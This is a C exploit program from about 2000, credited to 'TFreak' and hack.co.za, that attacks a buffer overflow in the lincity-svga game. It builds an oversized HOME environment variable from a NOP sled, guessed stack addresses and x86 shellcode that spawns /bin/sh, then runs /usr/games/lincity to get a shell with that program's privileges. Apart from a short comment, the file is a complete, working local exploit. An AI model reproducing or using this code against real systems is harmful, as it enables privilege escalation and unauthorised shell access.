/*
*  lincity-svga exploit by TFreak
*
*  another example of bad programming, copying the HOME environment
*  without bounds checking to a static size buffer (100 bytes)
*
*/

#include <stdio.h>

#define bs 250
#define of 300

unsigned long sp (void);

int main(int argc, char *argv[])
{
  char *p, *buf;
  char shell[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  unsigned long addr, *paddr;
  int i;

  buf = (char *) malloc(bs);
  p = buf;
  paddr = (unsigned long *) p;

  addr = sp() - of;

  for (i = 0; i < bs; i += 4)
    *(paddr++) = addr;

  memset(p, 0x90, bs/2);
  p += bs/2;

  for (i = 0; i < strlen(shell); i++)
    *(p++) = shell[i];

  setenv("HOME", buf, 1);
  execl("/usr/games/lincity", "lincity", NULL);
}

unsigned long sp (void)
{
  __asm__("movl %esp, %eax");
}
/*                    www.hack.co.za              [2000]*/